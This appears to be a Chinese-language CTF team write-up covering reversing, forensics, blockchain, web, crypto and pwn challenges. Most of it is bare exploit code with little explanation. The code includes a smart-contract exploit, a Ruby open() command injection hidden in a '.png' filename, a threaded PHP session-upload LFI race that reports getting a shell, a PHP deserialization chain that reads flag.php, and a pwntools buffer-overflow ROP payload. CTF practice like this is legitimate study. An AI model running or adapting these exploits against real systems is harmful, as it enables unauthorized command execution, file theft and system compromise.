动调猜内存,发现是亦或。
a=[0x53 ,0xF, 0x5A ,0x54, 0x50, 0x55, 0x3, 0x2, 0x0, 0x7, 0x56, 0x7, 0x7, 0x5B, 0x9, 0x0, 0x50, 0x5, 0x2, 0x3, 0x5D, 0x5C, 0x50, 0x51, 0x52, 0x54, 0x5A, 0x5F, 0x2, 0x57, 0x7, 0x34]
for i in range(30,-1,-1):
a[i]^=a[i+1]
flag=""
for i in range(32):
flag+=chr(a[i])
print("flag{"+flag+"}")
CheckIn
首先tshark提取一下usbdata的数据
tshark -r a.pcap -T fields -e usb.capdata | tr -s ‘\n’ > data_list
python脚本按行读取去除每行最后的换行。
result+=line[:-1]
利用010editor导入16进制保存即可。
之后diskgenius一下可以直接得到视频,拿到flag。
foremost后
双图盲水印。
记得flag应该是
flag{XqAe3QzK2ehD5fWv8jfBitPqHUw0}
paradigm-CTF原题
具体可以看我的安全客投稿
https://www.anquanke.com/post/id/250115
这里只贴exp了。
import web3
from web3 import Web3,HTTPProvider
from web3.auto import w3
import hashlib
import json
from Crypto.Util.number import *
web3=Web3(HTTPProvider("http://114.115.157.63:8545/"))
acct=web3.eth.account.from_key('0x107601f7600411eb7203286cf0c83aa4f18b336196c3c98a33dcbb3a49d89a3d')
"""abi=[
{
"stateMutability": "payable",
"type": "fallback"
}
]
opcode="6080604052348015600f57600080fd5b50605380601d6000396000f3fe60806040523273ffffffffffffffffffffffffffffffffffffffff16fffea2646970667358221220905d81ab00e22c4df5b3b4a0e06c36d582af1c1bda479c1f5d52b953fc13617064736f6c63430007000033"
cOntract=web3.eth.contract(abi=abi,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
'from': acct.address,
'nonce': web3.eth.getTransactionCount(acct.address),
'gas': 5000000,
'gasPrice': web3.toWei('21', 'gwei')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
print(tx_id.hex())"""
#print(web3.eth.getTransactionReceipt('0xb04cf1ce18efe0007088ac00792d2c0fd2e159c156ab68eca5890edc2fd23d73'))
# address2 : 0xcaF2f0A364B8D23787F63ed98590F65970b4C50b
abi2=[
{
"inputs": [],
"stateMutability": "nonpayable",
"type": "constructor"
},
{
"stateMutability": "payable",
"type": "fallback"
}
]
"""opcode="6080604052348015600f57600080fd5b5060838061001e6000396000f3fe6080604052600073caf2f0a364b8d23787f63ed98590f65970b4c50b6000806000806000855af19150508060325750604b565b3273ffffffffffffffffffffffffffffffffffffffff16ff5b00fea2646970667358221220cb8975fb237c4082d510ddec3bb377bd61c129f2794dfd25052e44f3c930257064736f6c63430007000033"
cOntract=web3.eth.contract(abi=abi2,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
'from': acct.address,
'nonce': web3.eth.getTransactionCount(acct.address),
'gas': 5000000,
'gasPrice': web3.toWei('21', 'gwei')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
import time
time.sleep(2)
print(web3.eth.getTransactionReceipt(tx_id))
"""
#print(web3.eth.getTransactionReceipt('0xbb5d4dd2462e3a808fb3d52aabd8defe0472041971e6eec4b753417d0c4ce5dc'))
# address 1 = 0xeeFDEed9E7A39965a397De6bbe31dfb314525b06
def get_txn(src, dst, datad,nonce, value=0, ):
return {
"from": src,
"to": dst,
"gasPrice": web3.toWei(1,'gwei'),
"gas": 3000000,
"value": web3.toWei(value,'wei'),
"nonce": nonce,#web3.eth.getTransactionCount(src),
"data": datad,
'chainId':8888
}
"""to_addr='0x9d629baE007F1B454A46fc03FA5FDedB335e5B18'
data=long_to_bytes(0xc24fe950000000000000000000000000eeFDEed9E7A39965a397De6bbe31dfb314525b06)
nOnce=web3.eth.getTransactionCount(acct.address)
signed_txn = web3.eth.account.signTransaction(get_txn(acct.address, to_addr, data, nonce), acct.privateKey)
txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
print("hack"+txn_hash)"""
print(web3.eth.getTransactionReceipt('0xc3de56cb62b665191cbc640b6a7a68ffa1d7c22e6aa4f577d0e1bc1d419c3827'))
#print(web3.eth.getTransactionReceipt('0x9ed9c7f8899040de1f54fe911b27474c56b9f4f9e17374fe552e40bbe96c9f70'))
扫到了/.git/下的一些东西
审计源码
/Readme/mytz.php
下可以act来控制一些动作
phpinfo()
即可拿到flag
Ruby的open可以执行命令
import requests
print(hex(ord('.')),hex(ord("/")))
res = requests.post(f"{url}/convert",data="file=echo bHMgLw== | base64 -d | sh;.png".encode("utf-8"),headers={"Content-Type":"application/x-www-form-urlencoded"},allow_redirects=False)
print(res.content)
PHP SESSION LFI 一把梭了
import requests
import threading
class BasePHPSessionHelper:
def __init__(self,host) -> None:
self.host = host
pass
@staticmethod
def createSession(upload_url,sess_name:str="ekitest"):
while True:
files = {
"submit" : ("eki.png","GIF89awhatever","image/png")
}
data = {"PHP_SESSION_UPLOAD_PROGRESS" : "');?>" }
headers = {'COOKIE':'PHPSESSID=' + sess_name}
r = requests.post(upload_url,files = files,headers = headers,data=data)
def sessionInclude(self,sess_name="ekitest"):
#sessiOnPath= "/var/lib/php5/sess_" + sess_name
sessiOnPath= f"/var/lib/php/sessions/sess_{sess_name}"
upload_url = f"{self.host}/lfi.php"
include_url = f"{self.host}/lfi.php?lfi={sessionPath}"
headers = {'COOKIE':'PHPSESSID=' + sess_name}
t = threading.Thread(target=self.createSession,args=(upload_url,sess_name))
t.setDaemon(True)
t.start()
while True:
res = requests.post(include_url,headers=headers)
if b'Eki' in res.content:
print("[*] Get shell success.")
break
else:
print("[-] retry.")
return True
import threading,requests
host= "http://114.115.134.72:32770"
class Exp(BasePHPSessionHelper):
@staticmethod
def createSession(upload_url,sess_name:str="ekitest"):
while True:
files = {
"submit" : ("eki.png","GIF89awhatever","image/png")
}
data = {"PHP_SESSION_UPLOAD_PROGRESS" : "');?>" }
headers = {'COOKIE':'PHPSESSID=' + sess_name}
r = requests.post(upload_url,files = files,headers = headers,data=data)
def sessionInclude(self,sess_name="ekitest"):
#sessiOnPath= "/var/lib/php5/sess_" + sess_name
#sessiOnPath= f"/var/lib/php/sessions/sess_{sess_name}"
sessiOnPath= f"/tmp/sess_{sess_name}"
upload_url = f"{self.host}/index.php"
include_url = f"{self.host}/index.php?file={sessionPath}"
headers = {'COOKIE':'PHPSESSID=' + sess_name}
t = threading.Thread(target=self.createSession,args=(upload_url,sess_name))
t.setDaemon(True)
t.start()
while True:
res = requests.post(include_url,headers=headers)
if b'Included' in res.content:
print("[*] Get shell success.")
print(include_url,res.content)
break
else:
print("[-] retry.")
return True
exp = Exp(host)
exp.sessionInclude("g")
mysql quine
随便反序列化好像就行了,
$heat = 1;
class pkshow
{
function echo_name()
{
return "Pk very safe^.^";
}
}
class acp
{
protected $cinder;
public $neutron;
public $nova;
function setCinder($cinder){
$this->cinder = $cinder;
}
function __toString()
{
if (isset($this->cinder))
return $this->cinder->echo_name();//here
}
}
class ace
{
public $filename;
public $openstack;
public $docker;
function echo_name()
{
$this->openstack = unserialize($this->docker);
$this->openstack->neutron = $heat;
if($this->openstack->neutron === $this->openstack->nova)
{
$file = "./{$this->filename}";
var_dump($file);
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "keystone lost~";
}
}
}
}
$b = new stdClass;
$b->neutron = $heat;
$b->nova = $heat;
$a = new ace;
$a->docker = $b;
$a->filename = 'flag.php';
$exp = new acp;
$exp->setCinder($a);
var_dump(urlencode(serialize($exp)));
$logData = unserialize(serialize($exp));
echo $logData;
?>
第一个discrete_log直接出
第二个P的阶有一个大因子,但是太大了魔改一下ph的思路就可以
第三个是P的阶是p用smartattack
from Crypto.Util.number import *
p = 146808027458411567
A = 46056180
B = 2316783294673
E = EllipticCurve(GF(p), [A, B])
P = E(119851377153561800, 50725039619018388, 1)
Q = E(22306318711744209, 111808951703508717, 1)
print(long_to_bytes(discrete_log(Q, P, operation='+')))
p = 1256438680873352167711863680253958927079458741172412327087203
A = 377999945830334462584412960368612
B = 604811648267717218711247799143415167229480
E = EllipticCurve(GF(p),[A,B])
P = E(550637390822762334900354060650869238926454800955557622817950, 700751312208881169841494663466728684704743091638451132521079, 1)
Q = E(1152079922659509908913443110457333432642379532625238229329830, 819973744403969324837069647827669815566569448190043645544592, 1)
print(factor(P.order()) )
factor_list = P.order().factor()
factor_list = [i[0] ^ i[1] for i in factor_list]
factor_list = factor_list[:-1]
M_i = [P.order() // i for i in factor_list]
a_i = [discrete_log(M_i[i] * Q, M_i[i] * P, factor_list[i], operation='+') for i in range(len(factor_list))]
a = crt(a_i, factor_list)
m = 1
for i in factor_list:
m *= i
# key = a + kk * m
# K = a * G + kk * m * G
# (K - a * G) = kk * (m * G)
# a new ecdlp and bound is kk
# kk is about 21 bit
# so just use bsgs
bound = (2 ^ 56) // m
kk = bsgs(m * P, Q - a * P, (bound // 2, bound), operation='+')
key = a + kk * m
print(bytes.fromhex(hex(key)[2:]))
def HenselLift(P,p,prec):
E = P.curve()
Eq = E.change_ring(QQ)
Ep = Eq.change_ring(Qp(p,prec))
x_P,y_P = P.xy()
x_lift = ZZ(x_P)
y_lift = ZZ(y_P)
x, y, a1, a2, a3, a4, a6 = var('x,y,a1,a2,a3,a4,a6')
f(a1,a2,a3,a4,a6,x,y) = y^2 + a1*x*y + a3*y - x^3 - a2*x^2 - a4*x - a6
g(y) = f(ZZ(Eq.a1()),ZZ(Eq.a2()),ZZ(Eq.a3()),ZZ(Eq.a4()),ZZ(Eq.a6()),ZZ(x_P),y)
gDiff = g.diff()
for i in range(1,prec):
uInv = ZZ(gDiff(y=y_lift))
u = uInv.inverse_mod(p^i)
y_lift = y_lift - u*g(y_lift)
y_lift = ZZ(Mod(y_lift,p^(i+1)))
y_lift = y_lift+O(p^prec)
return Ep([x_lift,y_lift])
def SmartAttack(P,Q,p,prec):
E = P.curve()
Eqq = E.change_ring(QQ)
Eqp = Eqq.change_ring(Qp(p,prec))
P_Qp = HenselLift(P,p,prec)
Q_Qp = HenselLift(Q,p,prec)
p_times_P = p*P_Qp
p_times_Q=p*Q_Qp
x_P,y_P = p_times_P.xy()
x_Q,y_Q = p_times_Q.xy()
phi_P = -(x_P/y_P)
phi_Q = -(x_Q/y_Q)
k = phi_Q/phi_P
k = Mod(k,p)
return k
像个背包?构造下面的格就出了
p = 7920896218820943056702891053785968782942077704655549145065876361907786355057528237061821280280635146678227702121299090049267547565989625947956850127609879
a = [5159988341992193282580685525745512910538614629527934692498086718630359717994948104271635300443062627349528208661883545208904466234606731357843882012950859,
6335284643679900918720817621948758994408045076082703123014899812263624185305268879304513104269749790342063146501376008458665966651095670658606928517201721,
6076126683981038494289949541335915228950649182831013867715530414744306299113418155691977393469353865827225836608438360416489035800225275307683760086087019]
c = 2262305826865903827781721021939132022253239409560318732728105425007767005455109451147816015758855318893496902119172860305961200859254558917933621119030425
just = 2 ^ 167
L = Matrix(ZZ, [[ 2, 0, 0, 0, p * just],
[ 0, 2^160, 0, 0, a[0] * just],
[ 0, 0, 2^224, 0, a[1] * just],
[ 0, 0, 0, 2^256, a[2] * just],
[ 2^320, 2^320, 2^320, 2^320, c * just]
])
res = list(L.LLL()[0])[1:4]
res = [(2^320 - res[i]) // L[i + 1][i + 1] for i in range(3)]
from gmpy2 import iroot
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.number import *
secrets = [0 for i in range(3)]
secrets[1] = iroot(res[0] // res[1], int(2))[0]
secrets[0] = iroot(res[2], int(2))[0]
secrets[2] = iroot(res[1] // secrets[0], int(2))[0]
secrets = [int(_) for _ in secrets]
print(secrets)
key = hashlib.sha256(str(secrets).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
enc_flag = cipher.decrypt(long_to_bytes(0x99ff236d4f1e020e6c83cc154e20f71eb510913056d47344b44a87f98664efd3))
print(enc_flag)
题目有问题
随便 传 5个数字就可以过第一个
再传15个就能过第二个
然后就有flag了
下面的exp也不对 看着题目说要 1 * 23 的向量 所以瞎传了个噪声回去
(反正全0也能出)
有问题这题
from pwn import *
import json
context.log_level = 'debug'
ip, port = '122.112.210.186', 51436
def deal(s):
return json.loads(s.replace(' ', ' ').replace(' ', ' ').replace('[ ', '[').replace(' ', ',').replace('\n', ''))
io = remote(ip, port)
io.recvuntil('23 :\n')
A = []
for i in range(5):
A.append(deal(io.recvline().decode()) + [0])
io.recvuntil('23 :\n')
b = deal(io.recvline().decode()) + [290]
A = Matrix(ZZ, A)
b = Matrix(ZZ, b)
mid = block_matrix([29 * identity_matrix(23), Matrix(ZZ, [0] * 23).T], ncols=2)
L = block_matrix([A, mid, b], nrows=3, subdivide=False)
B = L.LLL()
print(B)
E = Matrix(B[-1]).T[:-1].T
io.recvuntil('29 :\n')
io.sendline(E.str())
print(io.recvline())
# io.interactive()
io.recvline()
io.recvline()
io.recvuntil('143 :\n')
A = []
for i in range(15):
# print('###########')
aaaa = io.recvuntil('\n')
# print(aaaa)
A.append(deal(aaaa.decode()) + [0])
io.recvuntil('143 :\n')
b = deal(io.recvuntil(']').decode()) + [227]
A = Matrix(ZZ, A)
b = Matrix(ZZ, b)
mid = block_matrix([227 * identity_matrix(143), Matrix(ZZ, [0] * 143).T], ncols=2)
L = block_matrix([A, mid, b], nrows=3, subdivide=False)
print('start LLL')
B = L.LLL()
print('done. #########')
print(B)
E = Matrix(B[-1]).T[:-1].T
io.recvuntil('227 :\n')
io.sendline(E.str())
print(io.recvline())
ret2text
#coding:utf-8
from pwn import *
import subprocess, sys, os
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
elf_path = './pwn'
ip = '139.9.123.168'
port = 32548
remote_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
context(os='linux', arch='amd64')
context.log_level = 'debug'
def run(local = 1):
global elf
global p
if local == 1:
elf = ELF(elf_path, checksec = False)
p = elf.process()
else:
p = remote(ip, port)
run(0)
rdi = 0x000000000040120b
payload = 'a'*144+p64(0)+p64(rdi)+p64(0x403408)+p64(0x401030)
p.send(payload)
p.interactive()